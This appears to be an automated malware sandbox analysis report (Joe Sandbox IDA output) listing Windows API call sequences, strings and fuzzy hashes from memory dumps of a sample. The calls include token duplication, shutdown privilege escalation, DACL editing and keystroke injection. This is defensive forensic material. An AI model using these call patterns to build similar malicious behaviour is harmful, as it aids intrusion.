                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                        • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                        • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                        • GetParent.USER32(00000000), ref: 0047CDF7
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                        • SendMessageW.USER32 ref: 0047CE93
                                                                        • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,02F31B58,00000000,?,?,?,?), ref: 0047CF1C
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                        • SendMessageW.USER32 ref: 0047CF6B
                                                                        • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,02F31B58,00000000,?,?,?,?), ref: 0047CFE6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 3100379633-4164748364
                                                                        • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                        • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                        • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                        • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 00434420
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                        • IsIconic.USER32(?), ref: 0043444F
                                                                        • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                        • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                        • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                        • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                        • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 2889586943-2988720461
                                                                        • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                        • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                        • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                        • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                        APIs
                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                        • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                        • GetProcessWindowStation.USER32 ref: 004463D1
                                                                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                        • _wcslen.LIBCMT ref: 00446498
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • _wcsncpy.LIBCMT ref: 004464C0
                                                                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                        • CloseDesktop.USER32(?), ref: 0044657A
                                                                        • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                        • CloseHandle.KERNEL32(?), ref: 00446592
                                                                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                        • String ID: $@OH$default$winsta0
                                                                        • API String ID: 3324942560-3791954436
                                                                        • Opcode ID: 52a5cbb7690f64740f818e59e599c99b846dd20d3ab12822ed89c3a639b05c79
                                                                        • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                        • Opcode Fuzzy Hash: 52a5cbb7690f64740f818e59e599c99b846dd20d3ab12822ed89c3a639b05c79
                                                                        • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                        • FindClose.KERNEL32(00000000), ref: 00478924
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                        • __swprintf.LIBCMT ref: 004789D3
                                                                        • __swprintf.LIBCMT ref: 00478A1D
                                                                        • __swprintf.LIBCMT ref: 00478A4B
                                                                        • __swprintf.LIBCMT ref: 00478A79
                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                        • __swprintf.LIBCMT ref: 00478AA7
                                                                        • __swprintf.LIBCMT ref: 00478AD5
                                                                        • __swprintf.LIBCMT ref: 00478B03
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 999945258-2428617273
                                                                        • Opcode ID: 0f095038acdd7ac02838cf930404896e0365a825e7f4f628a9cf1bdfdd766fd8
                                                                        • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                        • Opcode Fuzzy Hash: 0f095038acdd7ac02838cf930404896e0365a825e7f4f628a9cf1bdfdd766fd8
                                                                        • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                        • __wsplitpath.LIBCMT ref: 00403492
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • _wcscpy.LIBCMT ref: 004034A7
                                                                        • _wcscat.LIBCMT ref: 004034BC
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                        • _wcscpy.LIBCMT ref: 004035A0
                                                                        • _wcslen.LIBCMT ref: 00403623
                                                                        • _wcslen.LIBCMT ref: 0040367D
                                                                        Strings
                                                                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                        • _, xrefs: 0040371C
                                                                        • Unterminated string, xrefs: 00428348
                                                                        • Error opening the file, xrefs: 00428231
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                        • API String ID: 3393021363-188983378
                                                                        • Opcode ID: 78f48f825e219418bf9b5df19dfe877f1b72b905c01bd98d046c3c676a5c4f44
                                                                        • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                        • Opcode Fuzzy Hash: 78f48f825e219418bf9b5df19dfe877f1b72b905c01bd98d046c3c676a5c4f44
                                                                        • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                        • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                        • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                        • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                        • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1409584000-438819550
                                                                        • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                        • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                        • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                        • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                        • __swprintf.LIBCMT ref: 00431C2E
                                                                        • _wcslen.LIBCMT ref: 00431C3A
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                        • String ID: :$\$\??\%s
                                                                        • API String ID: 2192556992-3457252023
                                                                        • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                        • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                        • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                        • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                        • __swprintf.LIBCMT ref: 004722B9
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: FolderPath$LocalTime__swprintf
                                                                        • String ID: %.3d
                                                                        • API String ID: 3337348382-986655627
                                                                        • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                        • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                        • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                        • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                        • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                        • FindClose.KERNEL32(00000000), ref: 00442930
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                        • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                          • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                        • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 2640511053-438819550
                                                                        • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                        • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                        • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                        • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                        • GetLastError.KERNEL32 ref: 00433414
                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2938487562-3733053543
                                                                        • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                        • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                        • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                        • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                        APIs
                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                          • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                          • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                        • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                        • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                        • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
